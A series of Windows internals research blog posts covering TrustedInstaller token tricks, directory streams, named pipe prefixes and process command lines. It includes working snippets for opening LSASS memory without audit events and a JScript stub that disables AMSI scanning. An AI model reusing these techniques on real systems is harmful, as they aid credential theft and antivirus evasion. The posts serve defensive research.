Well crap, it seems we can’t create a new process or impersonate the token. That’s not much good. At the bottom of the screenshot we can see why: the token we’ve got only has TOKEN_QUERY access. We typically need at least TOKEN_DUPLICATE access to get a primary token for a new process or to create an impersonation token. Checking the security descriptor of the token using Process Hacker (we don’t even have READ_CONTROL to read it from PS) explains why we’ve been granted such limited access.

Security descriptor for TrustedInstaller access token.

We can see that the Administrators group only has TOKEN_QUERY access, which at least matches up with the access we were granted on the token object. You might wonder why SeDebugPrivilege didn’t help here. The Debug privilege only bypasses the security checks on Process and Thread objects; it does nothing for Tokens, so we get no help. Are we stuck now, at least without the more destructive techniques such as changing the service binary?

Of course not. There are examples of how to get stuff running as TI, such as this, but they seem to rely on first getting code running as SYSTEM by installing a service (like psexec with the -s switch) and then stealing the TI token and creating a new process. Needless to say, if I wanted to create a service I’d just modify the TrustedInstaller service to begin with :-)

So here are two quick tricks to get around this permission limitation which don’t require any new or modified services or injecting shellcode. First, let’s deal with creating a new process. The parent of a new process is normally the caller of CreateProcess; however for UAC this would make all elevated processes children of the UAC service, which would look somewhat odd. To support the principle of least surprise MS introduced in Vista the ability to specify an explicit parent process when creating a new process, so that the elevated process could still be a child of the caller.

Normally in the UAC case you specify an explicit token to assign to the new process. However, if you don’t specify a token the new process will inherit from the assigned parent; the only requirement is that the handle to the process we use as a parent must have the PROCESS_CREATE_PROCESS access right. As we’ve got SeDebugPrivilege we can get full access to the TI process, including the right to create new child processes from it. As an added bonus the kernel process creation code will even assign the correct session ID for the caller so we can create interactive processes. We can exploit this behavior to create an arbitrary process running with the TI service’s token on the current desktop using the New-Win32Process cmdlet, passing the process object in the -ParentProcess parameter.
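
For example, reusing the process object from earlier (with SeDebugPrivilege the handle should have PROCESS_CREATE_PROCESS access):

New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p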

PowerShell window showing successful process creation from parent process

It’d be kind of useful to impersonate the token as well, without creating a new process. Is there a way we can achieve that? Sure, we can use the NtImpersonateThread API, which allows you to capture the impersonation context from an existing thread and apply it to another. The way impersonation contexts work is the kernel will try to capture the impersonation token for the thread first. If there is no existing impersonation token then it’ll take a copy of the primary token of the process associated with the thread and impersonate that instead. And the beauty of NtImpersonateThread is that, like setting the parent process, it doesn’t require permission to access the token; it just requires THREAD_DIRECT_IMPERSONATION access to a thread, which we can get thanks to SeDebugPrivilege. We can therefore get an impersonation token without a new process by the following steps:
  1. Open process with at least PROCESS_QUERY_INFORMATION access to list its threads.
  2. Open the first thread in the process with THREAD_DIRECT_IMPERSONATION access. We’ll assume that the thread isn’t impersonating some lowly user.
  3. Call NtImpersonateThread to steal an impersonation token.


PowerShell console showing successful impersonation.


Now, as long as something else doesn’t set the main thread’s impersonation token (and you don’t do anything on a separate thread) your PS console will act as if it has the TI group enabled. Handy :-)

Wrap-Up

Hopefully this has given you some information about what TrustedInstaller is, plus a few tricks to get hold of a token for that group from an admin account which would not normally be allowed one. This applies equally to a number of different system services on modern Windows, which can be a pain if you want to interact with their resources for testing purposes, such as using my Sandbox Tools to work out what resources they can access.

Update (20170821)
Thought I should at least repeat that of course there are many ways of getting the TI token other than these 3 techniques. For example, as Vincent Yiu pointed out on Twitter, if you’ve got easy access to a SYSTEM token, say using Metasploit’s getsystem command, you can impersonate SYSTEM and then open the TI token; it’s just IMO less easy :-). If you get a SYSTEM token with SeTcbPrivilege you can also call LogonUserExExW or LsaLogonUser, where you can specify a set of additional groups to apply to a service token. Finally, if you get a SYSTEM token with SeCreateTokenPrivilege (say from LSASS.exe if it’s not running as PPL) you can craft an arbitrary token using the NtCreateToken system call.

Accidental Directory Stream

It’s a well known fact that interface layers are a good source of bugs, and potentially security vulnerabilities. A feature which makes sense at the time of development might come back as a misfeature in subsequent years due to layers built above the feature. This blog post will describe one such weird edge case in file path handling on Windows. This edge case is very much in the category of "interesting" but not necessarily "useful" from a security perspective. If anyone thinks of a good use for it, let us all know :-)


Let's start with a simple bit of C++ code:


BOOL OpenFile(LPCWSTR filename) {
  HANDLE file = CreateFileW(filename, GENERIC_READ,
      FILE_SHARE_READ, nullptr, CREATE_ALWAYS, 0, nullptr);
  if (file == INVALID_HANDLE_VALUE)
    return FALSE;

  CloseHandle(file);
  return TRUE;
}


Nothing too strange here, OpenFile is just a wrapper around CreateFile. The purpose is to create a new file with a specified name and report TRUE if the creation was successful or FALSE if it was not. Now we need something to call OpenFile.

void Test(LPCWSTR filename) {
  if (!OpenFile(filename))
    wcout << L"Error (base) - " << filename << endl;
  else
    wcout << L"Success (base) - " << filename << endl;

  WCHAR full_path[MAX_PATH];
  if (!GetFullPathNameW(filename, MAX_PATH, full_path, nullptr)) {
    wcout << L"Error getting full path" << endl;
    return;
  }

  if (!OpenFile(full_path))
    wcout << L"Error (full) - " << filename << endl;
  else
    wcout << L"Success (full) - " << filename << endl;
}

The Test function opens a file twice. First it just uses the base filename passed to the function. The base filename is then converted to a full path and the file is opened again. If there’s no funny stuff then the two open calls should be equivalent.

void RunTests() {
  WCHAR temp_path[MAX_PATH];

  GetTempPathW(MAX_PATH, temp_path);
  SetCurrentDirectoryW(temp_path);

  Test(L"abc");
  Test(L":xyz");
}


Finally we have RunTests, which contains a couple of calls to Test. The function first changes the current directory to the user’s temp directory, so we know we’re in a writable location, and then runs Test twice with the different filenames abc and :xyz. What would we expect the results to be? The first test tries to create the file abc. Nothing too strange; according to the general Win32 path conversion rules you’d expect the abc file to be created inside the temp directory. The second test, :xyz, is a bit more tricky. It looks like an Alternate Data Stream (ADS) name, however to be a valid stream name you need the name of the file before the colon, otherwise what file would it add the stream to? Let’s find out the results by running the code:


Success (base) - abc
Success (full) - abc
Success (base) - :xyz
Error (full) - :xyz


Well, that result is unexpected. While we guessed correctly that abc would succeed, it seems :xyz succeeded when we passed the base filename but failed when we used the full filename. There must be a good reason for that behavior. Let’s use a debugger to try and work out why this occurs. First I run the application in WinDBG, adding the following breakpoint which will break on NtCreateFile and dump the OBJECT_ATTRIBUTES which contains the filename, then wait for the call to complete and print the NTSTATUS result:


bp ntdll!NtCreateFile "!obja @r8; gu; !error @rax; gh"


With the breakpoint set the tests can be executed; the following is the output:


Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is abc
OBJ_CASE_INSENSITIVE
Error code: (Win32) 0 (0) - The operation completed successfully.
Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is \??\C:\Users\user\AppData\Local\Temp\abc
OBJ_CASE_INSENSITIVE
Error code: (Win32) 0 (0) - The operation completed successfully.
Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is :xyz
OBJ_CASE_INSENSITIVE
Error code: (Win32) 0 (0) - The operation completed successfully.
Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is \??\C:\Users\user\AppData\Local\Temp\:xyz
OBJ_CASE_INSENSITIVE
Error code: (NTSTATUS) 0xc0000033 (3221225523) - Object Name invalid.


This at least explains why the second call to OpenFile with :xyz fails. Our call to GetFullPathName has resulted in a full path which is invalid. As I mentioned earlier you need a filename before the stream separator for the NTFS filename to be valid. But that doesn’t then explain why the first call succeeded.


The solution is that CreateFile doesn’t resolve the relative path to a full path, but instead passes on the same name we passed in, i.e. :xyz. This behavior is possible because the OBJECT_ATTRIBUTES structure has a RootDirectory field which contains a handle from which the kernel can start a parsing operation. Sadly !obja doesn’t print the handle value for us, so we’ll need to do it manually; replace the !obja part in the previous breakpoint with the following:


.printf \"Name: %msu Handle: %x\\n\", poi(@r8+10), poi(@r8+8)


If you change the breakpoint and re-run the application you'll get the following output:


Name: abc Handle: 94
Error code: (Win32) 0 (0) - The operation completed successfully.
Name: \??\C:\Users\user\AppData\Local\Temp\abc Handle: 0
Error code: (Win32) 0 (0) - The operation completed successfully.
Name: :xyz Handle: 94
Error code: (Win32) 0 (0) - The operation completed successfully.
Name: \??\C:\Users\user\AppData\Local\Temp\:xyz Handle: 0
Error code: (NTSTATUS) 0xc0000033 (3221225523) - Object Name invalid.


When the full path is passed the handle is NULL, but when the relative path is used it’s the value 0x94. And what is handle 0x94? It’s a handle to the current directory, which in this case is the temp directory. So if our theory is correct we should find a named stream xyz on the temp directory.
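
A quick way to check from PowerShell (the -Stream parameter needs PowerShell 3 or later):

Get-Item $env:TEMP -Stream *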


directory_stream.PNG


Let’s just check everything works as we expect, and let’s try it with a file as well:


directory_stream_2.PNG


So it works both for directories and files. The reason it works with CreateFile is we know the temp folder is writable, so we can create named streams. Parsing from an existing File object with a filename which starts with a colon results in the NTFS filesystem accessing a named stream rather than a new file or subdirectory. It makes some kind of twisted sense, but the fact that a relative path can have a totally different behavior from a fully qualified path is clearly not a designed-in feature but an interaction between the way NTFS handles relative paths and how Win32 optimizes file access in the current directory.


I did find documentation for this behavior on MSDN, but I can no longer seem to find the page. It’s not on the obvious pages, and during searching you find archaic gems such as this. However, as I said, I can’t think of a good use case for this behavior. If a privileged service is not canonicalizing and verifying paths then that’s already a potential security issue. And these paths have limited use; for example passing one to LoadLibrary fails as the path is canonicalized first and then opened.


Still, don't discount this misfeature as pointless. Never underestimate the value of unusual or undefined behavior in a system when looking for security vulnerabilities. I tend to collect and document stupid things like this because you really never know when they might come in handy. An OS like Windows is so complex I'm always learning new things and behaviors, even before new features are added. Improving your knowledge of a system is one of the best ways of becoming an effective security researcher, so don't be afraid to just mess around and test things. Even if you don't find a vulnerability you might at least get a new, interesting insight into how your platform of choice works.

Bypassing SACL Auditing on LSASS

Windows NT has supported the ability to audit resource access from day one. Any audit event ends up in the Security event log. To enable auditing an administrator needs to configure which types of resource access they want to audit in the Local or Group security policy, including whether to audit success and failure. Each resource to audit then needs to have a System Access Control List (SACL) applied which determines what types of access will be audited. The ACL can also specify a principal which limits the audit to specific groups.


My interest was piqued in this subject when I saw a tweet pointing out a change in Windows 10 which introduced a SACL for the LSASS process. The tweet contains a screenshot from a page describing changes in Windows 10 RTM. The implication is this addition of a SACL was to detect the use of tools such as Mimikatz which need to open the LSASS process. But does it work for that specific goal?


Let’s take apart this SACL for LSASS, what it means from an auditing perspective and then go into why this isn’t a great mechanism to discover Mimikatz or similar programs trying to access the memory of LSASS.


Let’s start by setting up a test system so we can verify the SACL is present, then enable auditing to check that we get auditing events when opening LSASS. I updated one of my Windows 10 1703 VMs, then installed the NtObjectManager PowerShell module.
lsass_open_annotated.png


A few things to note here: you must request the ACCESS_SYSTEM_SECURITY access right when opening the process, otherwise you can’t access the SACL. You must also explicitly request the SACL when accessing the process’ security descriptor. We can see the SACL as an SDDL string, which matches the SDDL string from the tweet/Microsoft web page. The SDDL representation isn’t a great way of understanding a SACL ACE, so I also expand it out in the middle. The expanded form tells us the ACE is an Audit ACE as expected, that the principal is the Everyone group, that the audit is enabled for both success and failure events and that the mask is set to 0x10.


Okay, let’s configure auditing for this event. I enabled Object Auditing in the system’s local security policy (for example run gpedit.msc) as shown:


audit_policy.PNG


You don’t need to reboot to change the auditing configuration, so just reopen the LSASS process as we did earlier in PowerShell; we should then see an audit event generated in the security event log as shown:


access_event_annotated.png


We can see that the event contains both the target process (LSASS) and the source process (PowerShell). So how can we bypass this? Well, let’s look back at what the SACL ACE means. The process the kernel goes through to determine whether to generate an audit event based on a SACL isn’t that much different from how the DACL is used in an access check. The kernel tries to find an ACE with a principal which is in the current token’s groups and with a mask representing one or more access rights which the opened handle has been granted. Looking back at the SACL ACE we can conclude that the audit event will be generated if the current token has the Everyone group and the handle has been granted access 0x10. What’s 0x10 when applied to a process? We can find out using the Get-NtAccessMask cmdlet.


PS C:\> Get-NtAccessMask -AccessMask 0x10 -ToSpecificAccess Process
VmRead


This shows that the access represents PROCESS_VM_READ, which makes sense. If you’re trying to block a process scraping the contents of LSASS the handle needs that access right to call ReadProcessMemory.


The first thought for bypassing this is: can you remove the Everyone group from your token and then open the process, at which point the audit rule shouldn’t match? Turns out, not easily. For a start, the only easy way of removing a group from a token is to convert it into a Deny Only group using CreateRestrictedToken; however, the kernel treats Deny Only groups as enabled for the purposes of auditing access checks. You can craft a new token without the group if you have SeCreateTokenPrivilege, but it turns out, based on testing, that the Everyone group is special; it doesn’t matter what groups you have in your token, it will still match for auditing.


So what about the access mask instead? If you don’t request PROCESS_VM_READ then the audit event isn’t triggered. Of course we actually want that access right to do the memory scraping, so how could we get around this? One way is you could open the process for ACCESS_SYSTEM_SECURITY then modify the SACL to remove the audit entry. Of course changing a SACL generates an audit event, though a different event ID to the object access, so if you’re not capturing those events you might miss it. But it turns out there’s at least one easier way: abusing handle duplication.


As I explained in a P0 blog post, the DuplicateHandle system call has an interesting behaviour when using the pseudo current process handle, which has the value -1. Specifically, if you try and duplicate the pseudo handle from another process you get back a full access handle to the source process. Therefore, to bypass the audit we can open LSASS with PROCESS_DUP_HANDLE access, duplicate the pseudo handle and get back a PROCESS_VM_READ access handle. You might assume this would still end up in the audit log, but it won’t: the handle duplication doesn’t result in an access check, so the auditing functions never run. Try it yourself to prove that it does indeed work.
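
In Win32 terms the trick looks roughly like this (a sketch; error handling omitted and lsass_pid assumed to have been found already):

// Open LSASS with only PROCESS_DUP_HANDLE, which doesn't match the SACL mask.
HANDLE lsass = OpenProcess(PROCESS_DUP_HANDLE, FALSE, lsass_pid);
HANDLE vm_read = NULL;
// Duplicating the pseudo handle (-1) out of LSASS performs no access check,
// so the SACL never generates an audit event.
DuplicateHandle(lsass, (HANDLE)-1, GetCurrentProcess(), &vm_read,
                PROCESS_VM_READ, FALSE, 0);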


dup_process.PNG


Of course this is just the easy way of bypassing the auditing. You could easily inject arbitrary code and threads into the process and also not hit the audit entry. This makes the audit SACL pretty useless as malicious code can easily circumvent it. As ever, if you’ve got administrator level code running on your machine you’re going to have a bad time.

So what’s the takeaway from this? One thing is you probably shouldn’t rely on the configured SACL to detect malicious code trying to exploit the memory in LSASS. The SACL is very weak, and it’s trivial to circumvent. Using something like Sysmon should do a better job (though I’ve not personally tried it) or enabling Credential Guard should stop the malicious code opening LSASS in the first place.

UPDATE: I screwed up my description of Credential Guard. CG uses Virtual Secure Mode to isolate the passwords and hashes in LSASS from people scraping the information, but it doesn't actually prevent you opening the LSASS process. You can also enable LSASS as a PPL which will block access, but I wouldn't trust PPL security.

Named Pipe Secure Prefixes

When writing named pipe servers on Windows it’s imperative to do so securely. One common problem you’ll encounter is named pipe squatting, where a low privileged application creates a named pipe server either before the real server does or as a new instance of an existing server. This could lead to information disclosure if the server is being used to aggregate private data from a number of clients, as well as elevation of privilege if the conditions are right.

There are some programming strategies to try and eliminate named pipe squatting, including passing the FILE_FLAG_FIRST_PIPE_INSTANCE flag to CreateNamedPipe, which will cause an error if the pipe already exists, as well as appropriate configuration of the pipe’s security descriptor. A recent addition to Windows is named pipe secure prefixes, which make it easier to develop a named pipe server which isn’t vulnerable to squatting. Unfortunately I can’t find any official documentation on these prefixes or how you use them. Prefixes seem to be mentioned briefly in Windows Internals, but it doesn’t go into any detail about what they are or why they work. So this blog is an effort to remedy that lack of documentation.

First let’s start with how named pipes are named. Named pipes are exposed by the Named Pipe File System (NPFS) driver, which creates the \Device\NamedPipe device object. When you create a new named pipe instance you call CreateNamedPipe (really NtCreateNamedPipeFile under the hood) with the full path to the pipe to create. It’s typical to see this in the form \\.\pipe\PipeName where PipeName is the name you want to assign. At the native API level this path is converted to \??\pipe\PipeName; \??\pipe is a symbolic link which ultimately resolves this path to \Device\NamedPipe\PipeName.

Even though \Device\NamedPipe is a file system, NPFS doesn’t support directories other than the root. If you list the contents of the named pipe root directory you’ll notice that some of the named pipes have backslashes in the name, however NPFS just treats them as names, as shown below.

named_pipes.PNG

So we’d assume we can’t have directories, but if we look at the function which handles IRP_MJ_CREATE dispatch in the NPFS driver we find something interesting:

NTSTATUS NpFsdCreate(PDEVICE_OBJECT device, PIRP irp) {
  PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(irp);
  BOOLEAN directory_file = stack->Parameters.Create.Options
                                 & FILE_DIRECTORY_FILE;
  DWORD disposition = stack->Parameters.Create.Options >> 24;
  NTSTATUS status;
  // Other stuff...

  if (directory_file) { // ← Check for creating a directory
    if (disposition == FILE_OPEN) {
      status = NpOpenNamedPipePrefix(...);
    } else if (disposition == FILE_CREATE
            || disposition == FILE_OPEN_IF) {
      status = NpCreateNamedPipePrefix(...);
    }
  }

  // Even more stuff...
}

In the code we can see that the flag for creating a directory file is checked. If a directory file is requested then the driver tries to create or open a named pipe prefix. Let’s try and create one of these prefixes:
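
Using NtObjectManager the attempt looks something like this (a sketch; treat the exact parameter names as assumptions):

New-NtFile -Path \Device\NamedPipe\Badgers -Options DirectoryFile -Disposition OpenIf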

create_prefix.PNG

Well darn, it says it requires a privilege. Let’s dig into NpCreateNamedPipePrefix to see which privilege we’re missing.

NTSTATUS NpCreateNamedPipePrefix(...) {
  // Blah blah...
  if (SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, UserMode)) {
    // Continue...
  } else {
    return STATUS_PRIVILEGE_NOT_HELD;
  }
}

So that’s awkward; TCB privilege is only granted to SYSTEM users, not even to administrators. While as an administrator it’s not that hard to get a SYSTEM token, the same can’t be said of the LocalService or NetworkService accounts. At least let’s check whether impersonating SYSTEM with TCB privilege will work to create a prefix:

create_prefix_working.PNG

We now have a new prefix called Badgers, so let’s try and create a new named pipe as a normal user under that prefix and see if it does anything interesting.

create_pipe_access_denied.PNG

We get STATUS_ACCESS_DENIED returned. This, it turns out, is because the driver will find the longest prefix that’s been registered and check whether the caller has access to the prefix’s security descriptor. What’s the security descriptor for the Badgers prefix?
prefix_sd.PNG

Seems it’s just SYSTEM and Administrators group with access, which makes sense based on the original caller being SYSTEM. Therefore, if we supply a more permissive security descriptor then it should allow a normal user to create the pipe.

create_with_dacl.PNG

Another question, how can we get rid of an existing prefix? You just need to close all handles to the prefix and it will go away automatically.

As said, it’s a pain that you need TCB privilege to create new secure prefixes, especially for non-administrator service accounts. Has the system created any prefixes already? There’s nothing obvious in NPFS. After a bit of investigation it turns out the Session Manager process (SMSS) creates a number of known prefixes in the function SmpCreateProtectedPrefixes. For example SMSS creates the following prefixes:

\ProtectedPrefix\Administrators
\ProtectedPrefix\LocalService
\ProtectedPrefix\NetWorkService

Each of these prefixes has a DACL based on its name, e.g. LocalService has a DACL which only allows the LocalService user to create named pipes under that prefix.
prefix_sd-2.PNG

It’s worth noting that the owner for the prefixes is the Administrators group which means an administrator could open the prefixes and rewrite the DACL, if you really wanted to screw with the OS :-)

Anyway, if you’re writing a new named pipe server and you want to make named pipe squatting more difficult, adding an appropriate secure prefix will prevent other users, especially low privileged users, from creating a new pipe with the same name. If someone knows where this is documented please let me know, as I think it’s a useful security feature which few know about.

Adding a Command Line to PowerShell's Process Listing

My NtObjectManager PowerShell module has plenty of useful functions and cmdlets, but it's not really designed for general use-cases such as system administration. I was reminded of this when I got a reply to a tweet I made announcing a new version of the module.

While the Get-NtProcess cmdlet does have a CommandLine property it's not really a good idea to use it just for that. Each process object returned from the cmdlet is an instance of the NtProcess class which maintains an open handle. While the garbage collector should eventually kick in and clean up for you it's still bad practice to leave open handles lying around.

Wouldn't it be useful if you could get the command line of a process without requiring a large third party module? As pointed out in the tweet you can use WMI, but it's uglier than calling Get-Process. It also has a small flaw: it doesn't show the command lines for elevated processes on the same desktop, which Get-NtProcess can do (at least on Windows 8 and above).

So I decided to investigate how I might add the command line to the existing Get-Process cmdlet in the simplest way possible. To do so I'll expose some functionality in PowerShell which I'm guessing few realise exists, or for that matter need to use. First let's see what type of object Get-Process is returning. We can call GetType on the returned objects to find that out.

PS C:\> $ps = Get-Process
PS C:\> $ps[0].GetType() | select Fullname

FullName
--------
System.Diagnostics.Process

We can see that it's just returning the list of normal framework Process objects. Nothing too surprising there, however one thing is interesting: the object has more properties available than the Process class in the framework. A good example is the Path property which returns the full path to the main executable:

PS C:\> $ps[0] | select Path

Path
----
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Where does that come from? Using the Get-Member cmdlet gives us a clue.

PS C:\> $ps[0] | Get-Member Path

   TypeName: System.Diagnostics.Process

Name MemberType     Definition
---- ----------     ----------
Path ScriptProperty System.Object Path {get=$this.Mainmodule.FileName;}

Very interesting, it seems to be a script property. After some digging it turns out this script is added in something called a Type Extension file, which has been around since the early days of PowerShell. It allows you to add arbitrary properties and methods to existing types. The extensions for the Process class are in $PSHome\types.ps1xml, a snippet of which is shown below.

<Type>
  <Name>System.Diagnostics.Process</Name>
  <Members>
    <ScriptProperty>
      <Name>Path</Name>
      <GetScriptBlock>$this.Mainmodule.FileName</GetScriptBlock>
    </ScriptProperty>
...

Of course what I should have done first is just check Lee Holmes' blog, where he wrote a description of these Type Extension files a mere 12 years ago! Anyway you can also get the help for this feature by running Get-Help about_Types.

This sounds ideal; we can create our own Type Extension file and add a scripted property to pull out the command line. We just need to write it. The easiest solution would be to use my NtApiDotNet .NET library, but if you're using that you might as well just use the NtObjectManager module to begin with, as the library is what the module is built on. Therefore, we'll re-implement everything in C# using Add-Type and invoke that to get the command line when necessary. This is not too hard, I just based it on the code in my library.
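
The core of it looks something like the following (a condensed sketch rather than the exact gist; ProcessCommandLineInformation, value 60, is available from Windows 8.1 onwards and the parsing assumes the documented UNICODE_STRING layout):

using System;
using System.Runtime.InteropServices;

public static class CommandLineReader {
  [DllImport("ntdll.dll")]
  static extern int NtQueryInformationProcess(IntPtr Process, int InfoClass,
      IntPtr Info, int Length, out int ReturnLength);

  [DllImport("kernel32.dll", SetLastError = true)]
  static extern IntPtr OpenProcess(int Access, bool Inherit, int Pid);

  [DllImport("kernel32.dll")]
  static extern bool CloseHandle(IntPtr Handle);

  const int ProcessCommandLineInformation = 60;
  const int PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;

  public static string GetCommandLine(int pid) {
    IntPtr process = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, pid);
    if (process == IntPtr.Zero)
      return null;
    try {
      // First call returns the required buffer length.
      int length;
      NtQueryInformationProcess(process, ProcessCommandLineInformation,
          IntPtr.Zero, 0, out length);
      IntPtr buffer = Marshal.AllocHGlobal(length);
      try {
        if (NtQueryInformationProcess(process, ProcessCommandLineInformation,
            buffer, length, out length) != 0)
          return null;
        // The buffer starts with a UNICODE_STRING describing the command line.
        int cmd_length = Marshal.ReadInt16(buffer);
        IntPtr cmd_buffer = Marshal.ReadIntPtr(buffer, IntPtr.Size);
        return Marshal.PtrToStringUni(cmd_buffer, cmd_length / 2);
      } finally {
        Marshal.FreeHGlobal(buffer);
      }
    } finally {
      CloseHandle(process);
    }
  }
}

The script property in the ps1xml then just needs to call [CommandLineReader]::GetCommandLine($this.Id).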

If you copy the gist into a file with a ps1xml extension you can then add the extension to the current session using the Update-TypeData cmdlet and passing the path to the file. If you want this to persist you can add the call to your profile, or save the session and reload it.

PS C:\> Update-TypeData .\command_line_type.ps1xml
PS C:\> Get-Process explorer | select CommandLine

CommandLine
-----------
C:\WINDOWS\Explorer.EXE

I’ve tried to make it as compact as possible; for example I don’t enable SeDebugPrivilege, which would be useful for administrators as it’d allow you to read the command line from almost any process on the system. You could add that feature if you like. One thing I had to do is call OpenProcess on the PID, which is odd as the Process class actually has a SafeHandle property which returns a native handle for the process. Unfortunately the framework opens this handle with PROCESS_ALL_ACCESS rights, not the limited PROCESS_QUERY_LIMITED_INFORMATION access we require. This means elevated processes could not be opened, removing the advantage this approach gives us.

This is also the reason WMI doesn't return all command lines. The WMI host process impersonates the caller when querying the command line for a process. WMI then uses an old method of extracting the command line, reading it directly from the process' memory (using a technique similar to this StackOverflow post). As this requires PROCESS_VM_READ access it fails for elevated processes. Perhaps they should move to the NtQueryInformationProcess approach on modern versions of Windows ;-)

PS C:\> start -verb runas notepad test.txt
PS C:\> Get-WmiObject Win32_process | ? Name -eq "notepad.exe" | select CommandLine

CommandLine
-----------

PS C:\> Get-Process notepad | select CommandLine

CommandLine
-----------
"C:\WINDOWS\system32\notepad.exe" test.txt

Hope you find this information useful, there's loads of useful functionality in PowerShell which can make your life much easier. You just have to find it first :-)

Disabling AMSI in JScript with One Simple Trick

This blog contains a very quick and dirty way to disable AMSI in the context of Windows Scripting Host which doesn't require admin privileges or modifying registry keys/system state which an AV such as Defender should pick up on. It's for information purposes only, I've tested this on an up-to-date Windows 10 1803 machine.

It's come to my attention that a default script file from DotNetToJScript no longer works because Windows Defender blocks it, thanks a lot everyone who contributed to getting my tools flagged as malware.

Dialog showing Windows defender blocks DotNetToJScript through AMSI.

If you look carefully in the screenshot you'll see that the "Affected items:" entry is prefixed with amsi:. This is an indication that the detection wasn't based on the file but on behavior observed through the Antimalware Scan Interface. Certainly the script could be reworked to get around this issue (it seems to work in scriptlets, oddly enough) but I'll probably never need to bother as I never wrote it for the use cases "Sharpshooter" uses it for. Still, I had an idea for a way of bypassing AMSI which I thought I'd test out.

I was in part inspired to dig this technique out again after seeing MDSec's recent work on newer bypasses for AMSI in PowerShell as well as a BlackHat Asia talk from Tal Liberman. However I've not seen this technique described anywhere else, but I'm sure someone can correct me if I'm wrong.


How AMSI Is Loaded in Windows Scripting Host

AMSI is implemented as a COM server which is used to communicate with the installed security product via an internal channel. A previous attack against AMSI was to hijack this COM registration, as documented by Matt Nelson. The scripting host is not supposed to call the COM object directly; instead it calls methods via exported functions in AMSI.DLL, which we can watch being loaded by setting an appropriate filter in Process Monitor.

AMSI loading into WScript.exe

We can use the stack trace feature of Process Monitor to find the code responsible for loading AMSI.DLL. It's actually part of the scripting engine, such as JScript or VBScript rather than a core part of WSH. The basics of the code are below.

HRESULT COleScript::Initialize() {
  hAmsiModule = LoadLibraryExW(L"amsi.dll", nullptr,
                               LOAD_LIBRARY_SEARCH_SYSTEM32);
  if (hAmsiModule) { // ①
    // Get initialization functions.
    FARPROC pAmsiInit = GetProcAddress(hAmsiModule, "AmsiInitialize");
    pAmsiScanString = GetProcAddress(hAmsiModule, "AmsiScanString");
    if (pAmsiInit) {
      if (pAmsiScanString && FAILED(pAmsiInit(&hAmsiContext))) // ②
        hAmsiContext = nullptr;
    }
  }
  bInit = TRUE; // ③
  return bInit;
}

Based on this code we can see it loading the AMSI DLL ① then calling AmsiInitialize to get a context handle ②. The interesting thing about this code is that regardless of whether AMSI initializes or not it will always return success ③. This leads to three ways of causing this code to fail and therefore never initialize AMSI: block loading AMSI.DLL, make AMSI.DLL not export methods such as AmsiInitialize, or cause AmsiInitialize to fail.

These are somewhat interconnected. For example Tal Liberman mentions in his presentation (slide 56) that you could copy an AMSI-using application to another directory and it will try and load AMSI.DLL from that directory. As the loaded AMSI.DLL can be some unrelated DLL which doesn't export AmsiInitialize, the load will succeed but the rest will fail. Unfortunately this trick won't work here as the LOAD_LIBRARY_SEARCH_SYSTEM32 flag is being passed, which means LoadLibraryEx will always try and load from SYSTEM32 first. Getting AmsiInitialize to fail will be a pain, and we can't trivially prevent this code loading AMSI.DLL from SYSTEM32, so what do we do? We preload an alternative AMSI.DLL of course.

Hijacking AMSI.DLL

How do we go about loading an alternative AMSI.DLL with the least amount of effort possible? Something which perhaps not everyone realizes is that LoadLibrary will try and find an existing loaded DLL with the requested name so that it doesn't load the same DLL twice. This works not just for the names of loaded DLLs but also for the main executable. Therefore, if we can convince the library loader that our main executable is actually called AMSI.DLL then it'll return that instead. Unable to find AmsiInitialize in our executable's exports, the code above will fail to initialize AMSI but will continue to execute the script without inspecting it.

How can we change the name of our main executable to AMSI.DLL without modifying process memory? Simple, we copy WSCRIPT.EXE to another directory but call it AMSI.DLL, then run it. Wait, what? How can we run AMSI.DLL, doesn't it need to be SOMETHING.EXE? On Windows there are two main ways of executing a process, ShellExecute or CreateProcess. When calling ShellExecute the API looks up the handler for the extension, such as .EXE or .DLL, and performs particular actions based on the result. Generally .EXE will redirect to just calling CreateProcess, whereas for .DLL it'll try and load it in a registered viewer; on a default system there probably isn't one. However, CreateProcess doesn't care what extension the file has as long as it's an executable file based on its PE header. [Aside, you can actually execute a DLL using the native APIs, but we don't have access to that from WSH]. Therefore, as long as we can call CreateProcess on AMSI.DLL, which is actually a copy of WSCRIPT.EXE, it will execute. To do this we can just use WScript.Shell's Exec method, which calls CreateProcess directly.

var obj = new ActiveXObject("WScript.Shell");
obj.Exec("amsi.dll dotnettojscript.js");

This results in a process called AMSI.DLL running. When JScript or VBScript tries to load AMSI.DLL it now gets back a reference to the main executable and AMSI no longer works. From what I can tell this short script doesn't get detected by AMSI itself, so it's safe to run to bootstrap the "real" code you want to run.

WScript.Exe running as AMSI.DLL

To summarise the attack:

  1. Start a stub script which copies WSCRIPT.EXE to a known location but with the name AMSI.DLL. This is still the same catalog signed executable just in a different location so would likely bypass detection based purely on signatures.
  2. In the stub script execute the newly created AMSI.DLL with the "real" script.
  3. Err, that's about it.
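
A minimal stub for steps 1 and 2 might look something like the following (the paths are purely illustrative):

var fso = new ActiveXObject("Scripting.FileSystemObject");
// Copy the catalog signed WSH executable to a writable location named AMSI.DLL.
fso.CopyFile("C:\\Windows\\System32\\wscript.exe", "C:\\Dummy\\amsi.dll");
// Run the real payload script under the renamed host.
var shell = new ActiveXObject("WScript.Shell");
shell.Exec("C:\\Dummy\\amsi.dll C:\\Dummy\\real_script.js");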

AFAIK this doesn't work with PowerShell because it seems to break something important inside the code which renders PS inoperable; whether this is by design or not I've no idea. Anyway, I know this is a silly way of bypassing AMSI, but it just shows that this sort of self-checking feature rarely works out very well when malware can very easily modify the platform which is doing the detection.

UWP Localhost Network Isolation and Edge


This blog post describes an interesting “feature” added to Windows to support Edge accessing the loopback network interface. For reference this was on Windows 10 1803 running Edge 42.17134.1.0 as well as verifying on Windows 10 RS5 17713 running 43.17713.1000.0.

